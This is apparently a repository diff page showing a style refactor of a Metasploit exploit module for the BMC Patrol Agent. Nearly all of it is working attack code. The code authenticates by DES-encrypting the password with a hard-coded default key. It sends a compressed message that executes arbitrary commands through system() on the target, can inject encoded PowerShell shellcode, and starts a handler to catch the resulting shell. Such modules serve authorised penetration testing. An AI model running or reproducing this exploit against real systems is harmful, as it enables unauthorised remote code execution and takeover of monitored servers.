OptString.new('CMD', [false, 'command to run on the target. If this option is specified the payload will be ignored.'])
|
||||
]
|
||||
)
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
def cleanup
|
||||
disconnect
|
||||
|
@ -196,12 +203,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
super
|
||||
end
|
||||
|
||||
def get_target_os( srv_info_msg )
|
||||
def get_target_os(srv_info_msg)
|
||||
lines = srv_info_msg.split("\n")
|
||||
fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
|
||||
fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" && lines[1] != "{" && lines[-1] != "}"
|
||||
|
||||
os = $nil
|
||||
ver = $nil
|
||||
os = nil
|
||||
ver = nil
|
||||
lines[2..-2].each do |i|
|
||||
val = i.split("=")
|
||||
if val.length == 2
|
||||
|
@ -212,62 +219,62 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
[os,ver]
|
||||
[os, ver]
|
||||
end
|
||||
|
||||
def get_cmd_output( cmd_output_msg )
|
||||
def get_cmd_output(cmd_output_msg)
|
||||
|
||||
lines = cmd_output_msg.split("\n")
|
||||
fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
|
||||
fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" && lines[1] != "{" && lines[-1] != "}"
|
||||
|
||||
#Parse out command results
|
||||
# Parse out command results
|
||||
idx_start = cmd_output_msg.index("Result\x00")
|
||||
idx_end = cmd_output_msg.index("RemPsl_user")
|
||||
output = cmd_output_msg[idx_start+7..idx_end-1]
|
||||
output = cmd_output_msg[idx_start + 7..idx_end - 1]
|
||||
|
||||
output
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
#Manually start the handler if not running a single command
|
||||
if datastore['CMD'] == $nil or datastore['CMD'].empty?
|
||||
# Manually start the handler if not running a single command
|
||||
if datastore['CMD'].nil? || datastore['CMD'].empty?
|
||||
|
||||
#Set to nil if the cmd is empty for checks further down
|
||||
datastore['CMD'] = $nil
|
||||
# Set to nil if the cmd is empty for checks further down
|
||||
datastore['CMD'] = nil
|
||||
datastore['DisablePayloadHandler'] = false
|
||||
|
||||
#Configure the payload handler
|
||||
# Configure the payload handler
|
||||
payload_instance.exploit_config = {
|
||||
'active_timeout' => 300
|
||||
}
|
||||
#Setup the payload handler
|
||||
# Setup the payload handler
|
||||
payload_instance.setup_handler
|
||||
|
||||
#Start the payload handler
|
||||
# Start the payload handler
|
||||
payload_instance.start_handler
|
||||
|
||||
end
|
||||
|
||||
#Initialize zlib objects
|
||||
# Initialize zlib objects
|
||||
@deflater = Zlib::Deflate.new(4, 15, Zlib::MAX_MEM_LEVEL, Zlib::DEFAULT_STRATEGY)
|
||||
@inflater = Zlib::Inflate.new()
|
||||
@inflater = Zlib::Inflate.new
|
||||
|
||||
#Connect to the BMC Patrol Agent
|
||||
# Connect to the BMC Patrol Agent
|
||||
connect
|
||||
print_status("Connected to BMC Patrol Agent.")
|
||||
|
||||
#Create session msg
|
||||
# Create session msg
|
||||
create_session
|
||||
ret_data = receive_msg
|
||||
fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data == $nil
|
||||
fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data.nil?
|
||||
|
||||
#Authenticate
|
||||
# Authenticate
|
||||
authenticate_user(datastore['USER'], datastore['PASSWORD'])
|
||||
|
||||
#receive the authentication response
|
||||
# Receive the authentication response
|
||||
ret_data = receive_msg
|
||||
fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data == $nil
|
||||
fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data.nil?
|
||||
|
||||
ret_msg = process_response(ret_data)
|
||||
if ret_msg =~ /logged in/
|
||||
|
@ -276,49 +283,49 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
fail_with(Failure::UnexpectedReply, "Login failed. Aborting.")
|
||||
end
|
||||
|
||||
#receive the server info
|
||||
# Receive the server info
|
||||
ret_data = receive_msg
|
||||
fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data == $nil
|
||||
fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data.nil?
|
||||
srv_info = process_response(ret_data)
|
||||
|
||||
#Get the target's OS from their info msg
|
||||
# Get the target's OS from their info msg
|
||||
target_os = get_target_os(srv_info)
|
||||
|
||||
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
|
||||
# When using autotargeting, MSF selects the Windows meterpreter as the default payload.
|
||||
# Fail if this is the case and ask the user to select an appropriate payload.
|
||||
if target_os[0] == 'Linux' and payload_instance.name =~ /Windows/ and datastore['CMD'] == $nil
|
||||
if target_os[0] == 'Linux' && payload_instance.name =~ /Windows/ && datastore['CMD'].nil?
|
||||
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
|
||||
end
|
||||
|
||||
target_name = target.name
|
||||
if datastore['CMD'] != $nil
|
||||
if !datastore['CMD'].nil?
|
||||
command = datastore['CMD'].tr('"', '\"')
|
||||
print_status("Command to execute: #{command}")
|
||||
elsif target_name == 'Windows Powershell Injected Shellcode'
|
||||
#Get encoded powershell of payload
|
||||
# Get encoded powershell of payload
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, method: 'reflection')
|
||||
else
|
||||
command = payload.raw.tr('"', '\"')
|
||||
end
|
||||
|
||||
#Run command
|
||||
# Run command
|
||||
run_cmd(command)
|
||||
|
||||
#receive command confirmation
|
||||
# Receive command confirmation
|
||||
ret_data = receive_msg
|
||||
if ret_data != $nil
|
||||
if !ret_data.nil?
|
||||
process_response(ret_data)
|
||||
end
|
||||
|
||||
#receive command output
|
||||
# Receive command output
|
||||
ret_data = receive_msg
|
||||
if ret_data != $nil && datastore['CMD'] != $nil
|
||||
cmd_result_data = process_response( ret_data )
|
||||
if !ret_data.nil? && !datastore['CMD'].nil?
|
||||
cmd_result_data = process_response(ret_data)
|
||||
cmd_result = get_cmd_output(cmd_result_data)
|
||||
print_status( "Output:\n#{cmd_result}" )
|
||||
print_status("Output:\n#{cmd_result}")
|
||||
end
|
||||
|
||||
#Handle the shell
|
||||
# Handle the shell
|
||||
handler
|
||||
|
||||
end
|
||||
|
@ -326,16 +333,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def receive_msg
|
||||
|
||||
header = sock.get_once(6)
|
||||
if header == $nil
|
||||
if header.nil?
|
||||
return
|
||||
end
|
||||
|
||||
payload_size_arr = header[0,4]
|
||||
payload_size = payload_size_arr.unpack("N")[0]
|
||||
payload_size_arr = header[0, 4]
|
||||
payload_size = payload_size_arr.unpack1("N")
|
||||
payload = ''
|
||||
if payload_size > 0
|
||||
payload = sock.get_once(payload_size)
|
||||
if payload == $nil
|
||||
if payload.nil?
|
||||
return
|
||||
end
|
||||
end
|
||||
|
@ -349,31 +356,33 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
data_len = data.length
|
||||
buf = [data_len].pack('N')
|
||||
|
||||
#Set the type
|
||||
# Set the type
|
||||
buf += [type].pack('C')
|
||||
|
||||
#Set compression flag
|
||||
# Set compression flag
|
||||
buf += [compression].pack('C')
|
||||
|
||||
#Add data
|
||||
# Add data
|
||||
buf += data
|
||||
|
||||
#Send msg
|
||||
# Send msg
|
||||
sock.put(buf)
|
||||
|
||||
end
|
||||
|
||||
def process_response( ret_data )
|
||||
def process_response(ret_data)
|
||||
|
||||
ret_size_arr = ret_data[0,4]
|
||||
ret_size = ret_size_arr.unpack("N")[0]
|
||||
# While style checks complain, I intend to leave this parsing
|
||||
# in place for debugging purposes
|
||||
ret_size_arr = ret_data[0, 4]
|
||||
ret_size = ret_size_arr.unpack1("N") # rubocop:disable Lint/UselessAssignment
|
||||
|
||||
msg_type = ret_data[4,1]
|
||||
comp_flag = ret_data[5,1]
|
||||
msg_type = ret_data[4, 1] # rubocop:disable Lint/UselessAssignment
|
||||
comp_flag = ret_data[5, 1]
|
||||
|
||||
payload_data = ret_data[6..-1]
|
||||
if comp_flag == "\x00"
|
||||
bin_data = payload_data.unpack("H*")[0]
|
||||
bin_data = payload_data.unpack1("H*") # rubocop:disable Lint/UselessAssignment
|
||||
payload_data = @inflater.inflate(payload_data)
|
||||
end
|
||||
|
||||
|
@ -384,7 +393,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def run_cmd(cmd)
|
||||
|
||||
user_num = rand 1000..9999
|
||||
msg_1 = %Q(R_E
|
||||
msg_1 = %(R_E
|
||||
{
|
||||
\tRE_ID=1
|
||||
\tRE_PDESC=0\tRemPsl\tsystem("#{cmd}");\tRemPsl_user_#{user_num}
|
||||
|
@ -396,48 +405,48 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
)
|
||||
|
||||
msg_1 += "\x00"
|
||||
#Compress the message
|
||||
# Compress the message
|
||||
comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
|
||||
send_msg( 0x44, 0x0, comp_data )
|
||||
send_msg(0x44, 0x0, comp_data)
|
||||
|
||||
end
|
||||
|
||||
def identify( user )
|
||||
def identify(user)
|
||||
|
||||
inner_len = 15
|
||||
msg_type = 8
|
||||
len_str = [inner_len].pack("N")
|
||||
msg_str = [msg_type].pack("N")
|
||||
msg_1 = %Q(PEM_MSG
|
||||
msg_1 = %(PEM_MSG
|
||||
{
|
||||
\tNSDL=#{inner_len.to_s}
|
||||
\tNSDL=#{inner_len}
|
||||
\tPEM_DGRAM=#{len_str}#{msg_str}#{user}\x00
|
||||
}
|
||||
)
|
||||
msg_1 += "\x00"
|
||||
print_status( "Msg: #{msg_1}" )
|
||||
bin_data = msg_1.unpack("H*")[0]
|
||||
#Compress the message
|
||||
print_status("Msg: #{msg_1}")
|
||||
bin_data = msg_1.unpack1("H*") # rubocop:disable Lint/UselessAssignment
|
||||
# Compress the message
|
||||
comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
|
||||
send_msg( 0x44, 0x0, comp_data )
|
||||
send_msg(0x44, 0x0, comp_data)
|
||||
|
||||
end
|
||||
|
||||
def create_session()
|
||||
def create_session
|
||||
sess_msg = "\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\x00\x04\x02\x04\x03\x10\x00\x00\x03\x04\x00\x00\x00\x00\x01\x01\x04\x00\xff\x00\x00\x00"
|
||||
sess_msg += "\x00" * 0x68
|
||||
send_msg( 0x45, 0x2, sess_msg )
|
||||
send_msg(0x45, 0x2, sess_msg)
|
||||
end
|
||||
|
||||
def authenticate_user( user, password )
|
||||
#Default encryption key
|
||||
def authenticate_user(user, password)
|
||||
# Default encryption key
|
||||
enc_key = 'k$C4}@"_'
|
||||
output_data = des_crypt_func( password, enc_key, DES_ENCRYPT)
|
||||
#Convert to hex string
|
||||
encrpted_pw = output_data.unpack("H*")[0]
|
||||
output_data = des_crypt_func(password, enc_key, DES_ENCRYPT)
|
||||
# Convert to hex string
|
||||
encrpted_pw = output_data.unpack1("H*")
|
||||
des_pw = encrpted_pw.upcase
|
||||
|
||||
msg_1 = %Q(ID
|
||||
msg_1 = %(ID
|
||||
{
|
||||
\tHOST=user
|
||||
\tUSER=#{user}
|
||||
|
@ -452,11 +461,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
msg_1 += "\x00"
|
||||
comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
|
||||
send_msg( 0x44, 0x0, comp_data )
|
||||
send_msg(0x44, 0x0, comp_data)
|
||||
|
||||
end
|
||||
|
||||
def rotate_block_init( input_block_tuple )
|
||||
def rotate_block_init(input_block_tuple)
|
||||
|
||||
v6 = 0
|
||||
v5 = 0
|
||||
|
@ -657,14 +666,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
v6 |= 0x80000000
|
||||
end
|
||||
|
||||
#Create return tuple
|
||||
# Create return tuple
|
||||
ret_block = Array.new
|
||||
ret_block.push v5
|
||||
ret_block.push v6
|
||||
ret_block
|
||||
end
|
||||
|
||||
def rotate_block_final( input_block_tuple )
|
||||
def rotate_block_final(input_block_tuple)
|
||||
|
||||
v6 = 0
|
||||
v5 = 0
|
||||
|
@ -865,31 +874,30 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
v6 |= 0x80000000
|
||||
end
|
||||
|
||||
#Create return tuple
|
||||
# Create return tuple
|
||||
ret_block = Array.new
|
||||
ret_block.push v5
|
||||
ret_block.push v6
|
||||
ret_block
|
||||
end
|
||||
|
||||
def load( a1 )
|
||||
|
||||
a2 = Array.new(8,0)
|
||||
def load(a1)
|
||||
a2 = Array.new(8, 0)
|
||||
v3 = a1
|
||||
a2[0] = a1 & 0xff
|
||||
v3 >>= 3;
|
||||
v3 >>= 3
|
||||
a2[1] = v3 & 0xff
|
||||
v3 >>= 4;
|
||||
v3 >>= 4
|
||||
a2[2] = v3 & 0xff
|
||||
v3 >>= 4;
|
||||
v3 >>= 4
|
||||
a2[3] = v3 & 0xff
|
||||
v3 >>= 4;
|
||||
v3 >>= 4
|
||||
a2[4] = v3 & 0xff
|
||||
v3 >>= 4;
|
||||
v3 >>= 4
|
||||
a2[5] = v3 & 0xff
|
||||
v3 >>= 4;
|
||||
v3 >>= 4
|
||||
a2[6] = v3 & 0xff
|
||||
v3 >>= 4;
|
||||
v3 >>= 4
|
||||
a2[7] = v3 & 0xff
|
||||
a2[0] = (a2[0] * 2) & 0xff
|
||||
a2[7] |= (16 * a2[0]) & 0xff
|
||||
|
@ -900,56 +908,51 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
data_block[0] &= 0x3F3F3F3F
|
||||
data_block[1] &= 0x3F3F3F3F
|
||||
data_block
|
||||
|
||||
end
|
||||
|
||||
|
||||
def desx( data_block, ksch, idx)
|
||||
|
||||
def desx(data_block, ksch, idx)
|
||||
ksch = ksch.pack("V*")
|
||||
ksch = ksch.unpack("Q<*")
|
||||
key_block = ksch[idx]
|
||||
|
||||
data_block_ptr = data_block.pack("V*")
|
||||
data_block_ptr = data_block_ptr.unpack("Q<*")[0]
|
||||
data_block_ptr = data_block_ptr.unpack1("Q<*")
|
||||
data_block_ptr ^= key_block
|
||||
|
||||
right = 0
|
||||
left = 0
|
||||
counter = 1
|
||||
data_block_byte_ptr = [data_block_ptr].pack('Q<')
|
||||
left = SBOXES[data_block_byte_ptr[0].ord]
|
||||
right = SBOXES[data_block_byte_ptr[0].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
left ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
right ^= SBOXES[data_block_byte_ptr[1].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
left ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
right ^= SBOXES[data_block_byte_ptr[2].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
left ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
right ^= SBOXES[data_block_byte_ptr[3].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
left ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
right ^= SBOXES[data_block_byte_ptr[4].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
left ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
right ^= SBOXES[data_block_byte_ptr[5].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
left ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
right ^= SBOXES[data_block_byte_ptr[6].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
left ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)]
|
||||
counter+=1
|
||||
counter += 1
|
||||
right ^= SBOXES[data_block_byte_ptr[7].ord + (counter << 6)]
|
||||
|
||||
#Create return tuple
|
||||
# Create return tuple
|
||||
ret_block = Array.new
|
||||
ret_block.push left
|
||||
ret_block.push right
|
||||
|
@ -957,67 +960,66 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
def store( data_block )
|
||||
def store(data_block)
|
||||
a1 = data_block.pack("V*")
|
||||
val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1;
|
||||
val = val & 0xffffffff
|
||||
val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1
|
||||
val & 0xffffffff
|
||||
end
|
||||
|
||||
def sbox_xors( data_block_in, ksch_arg, decrypt_flag)
|
||||
def sbox_xors(data_block_in, ksch_arg, decrypt_flag)
|
||||
|
||||
decrypt_flag_cpy = decrypt_flag
|
||||
if (decrypt_flag & 0x100) != 0
|
||||
data_block_0 = data_block_in
|
||||
else
|
||||
data_block_0 = rotate_block_init( data_block_in )
|
||||
data_block_0 = rotate_block_init(data_block_in)
|
||||
end
|
||||
|
||||
#puts data_block_0
|
||||
encrypt_flag = (decrypt_flag_cpy & 1) == 0
|
||||
ti_block_0 = load( data_block_0[0] )
|
||||
ti_block_1 = load( data_block_0[1] )
|
||||
ti_block_0 = load(data_block_0[0])
|
||||
ti_block_1 = load(data_block_0[1])
|
||||
|
||||
for i in 0..15
|
||||
ti_cpy = ti_block_1
|
||||
if encrypt_flag
|
||||
ti_block_1 = desx( ti_block_1, ksch_arg, i )
|
||||
ti_block_1 = desx(ti_block_1, ksch_arg, i)
|
||||
else
|
||||
ti_block_1 = desx( ti_block_1, ksch_arg, 15 - i )
|
||||
ti_block_1 = desx(ti_block_1, ksch_arg, 15 - i)
|
||||
end
|
||||
ti_block_1[0] ^= ti_block_0[0]
|
||||
ti_block_1[1] ^= ti_block_0[1]
|
||||
ti_block_0 = ti_cpy
|
||||
end
|
||||
|
||||
data_block_0[0] = store( ti_block_1 )
|
||||
data_block_0[1] = store( ti_block_0 )
|
||||
data_block_0[0] = store(ti_block_1)
|
||||
data_block_0[1] = store(ti_block_0)
|
||||
|
||||
if (!(decrypt_flag_cpy & 0x200) != 0 )
|
||||
rotate_block_final( data_block_0 )
|
||||
if (!(decrypt_flag_cpy & 0x200) != 0)
|
||||
rotate_block_final(data_block_0)
|
||||
else
|
||||
data_block_0
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def set_key_unchecked( key )
|
||||
def gen_key_unchecked(key)
|
||||
|
||||
idx = 0
|
||||
key_arr = key.unpack("V*")
|
||||
key_sch = Array.new
|
||||
for i in 0..15
|
||||
for i in 0..15
|
||||
idx += ROTATIONS[i].ord
|
||||
v6 = 0;
|
||||
v5 = 0;
|
||||
v14 = 0;
|
||||
v6 = 0
|
||||
v5 = 0
|
||||
v14 = 0
|
||||
for j in 0..47
|
||||
pc2_p1 = ( idx + PC2[j].ord ) % 0x1C
|
||||
pc2_p1 = (idx + PC2[j].ord) % 0x1C
|
||||
if PC2[j].ord > 0x1B
|
||||
pc2_p2 = 0x1c
|
||||
else
|
||||
pc2_p2 = 0
|
||||
end
|
||||
v13 = PC1[ pc2_p1 + pc2_p2 ].ord
|
||||
v13 = PC1[pc2_p1 + pc2_p2].ord
|
||||
if v13 <= 31
|
||||
v12 = 0
|
||||
else
|
||||
|
@ -1033,7 +1035,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
v11 = 8 * (v10 / 6) + v10 % 6
|
||||
key_and = key_arr[v12] & SBOX_BYTE_ORDER[v13]
|
||||
|
||||
if ( key_and != 0)
|
||||
if (key_and != 0)
|
||||
if v14 == 1
|
||||
v6 |= SBOX_BYTE_ORDER[v11]
|
||||
else
|
||||
|
@ -1047,17 +1049,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
key_sch
|
||||
end
|
||||
|
||||
def des_string_to_key( key_buf_str )
|
||||
def des_string_to_key(key_buf_str)
|
||||
|
||||
des_keysch_0 = set_key_unchecked(INIT_DES_KEY_0)
|
||||
des_keysch_1 = set_key_unchecked(INIT_DES_KEY_1)
|
||||
des_keysch_0 = gen_key_unchecked(INIT_DES_KEY_0)
|
||||
des_keysch_1 = gen_key_unchecked(INIT_DES_KEY_1)
|
||||
|
||||
temp_key1 = Array.new(8,0)
|
||||
temp_key2 = Array.new(8,0)
|
||||
temp_key1 = Array.new(8, 0)
|
||||
temp_key2 = Array.new(8, 0)
|
||||
|
||||
key_buf_bytes = key_buf_str.unpack("c*")
|
||||
|
||||
counter = 0;
|
||||
counter = 0
|
||||
key_buf_str_len = key_buf_bytes.length - 1
|
||||
for i in 0..key_buf_str_len
|
||||
counter %= 8
|
||||
|
@ -1074,18 +1076,15 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
counter += 1
|
||||
end
|
||||
|
||||
data_block = temp_key1.pack("c*").unpack("V*")
|
||||
data_block = temp_key2.pack("c*").unpack("V*")
|
||||
|
||||
#Prepare return array
|
||||
ret_key = Array.new(8,0)
|
||||
# Prepare the return array
|
||||
ret_key = Array.new(8, 0)
|
||||
for j in 0..7
|
||||
ret_key[j] = temp_key2[j] ^ temp_key1[j]
|
||||
end
|
||||
ret_key.pack("c*")
|
||||
end
|
||||
|
||||
def des_cbc( input_buf, buf_len, key_sch, iv, decrypt_flag )
|
||||
def des_cbc(input_buf, key_sch, iv, decrypt_flag)
|
||||
|
||||
output_block_arr = Array.new
|
||||
blocks = input_buf.unpack("Q<*")
|
||||
|
@ -1099,16 +1098,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
current_block_tuple = [current_block].pack("Q<").unpack("V*")
|
||||
output_block_tuple = sbox_xors( current_block_tuple, key_sch, decrypt_flag)
|
||||
output_block = output_block_tuple.pack("V*").unpack("Q<")[0]
|
||||
output_block_tuple = sbox_xors(current_block_tuple, key_sch, decrypt_flag)
|
||||
output_block = output_block_tuple.pack("V*").unpack1("Q<")
|
||||
output_block_arr.push output_block
|
||||
|
||||
if decrypt_flag == 1
|
||||
output_block ^= iv
|
||||
result = cur_block
|
||||
iv = cur_block
|
||||
else
|
||||
result = output_block
|
||||
iv = output_block
|
||||
end
|
||||
end
|
||||
|
@ -1117,17 +1114,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
def des_crypt_func( binary_buf, key_buf, decrypt_flag )
|
||||
def des_crypt_func(binary_buf, key_buf, decrypt_flag)
|
||||
des_key = des_string_to_key(key_buf)
|
||||
des_keysch = set_key_unchecked( des_key )
|
||||
des_keysch = gen_key_unchecked(des_key)
|
||||
|
||||
bin_buf_len = binary_buf.length
|
||||
if decrypt_flag == 1
|
||||
v13 = ((binary_buf.length + 8) & 0xFFFFFFFFFFFFFFF8) - 1
|
||||
bin_buf_len = v13 + 1
|
||||
end
|
||||
|
||||
temp_enc_buf = Array.new( 8 * ((binary_buf.length + 7) >> 3) + 8, 0)
|
||||
temp_enc_buf = Array.new(8 * ((binary_buf.length + 7) >> 3) + 8, 0)
|
||||
binary_buf_str = binary_buf.unpack('c*')
|
||||
|
||||
for j in 0..binary_buf_str.length - 1
|
||||
|
@ -1135,8 +1126,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
temp_enc_buf = temp_enc_buf.pack('c*')
|
||||
pw_len_shift = (bin_buf_len + 7) >> 3
|
||||
output_buf = des_cbc( temp_enc_buf, 8 * pw_len_shift, des_keysch, 0, decrypt_flag)
|
||||
output_buf = des_cbc(temp_enc_buf, des_keysch, 0, decrypt_flag)
|
||||
output_buf
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue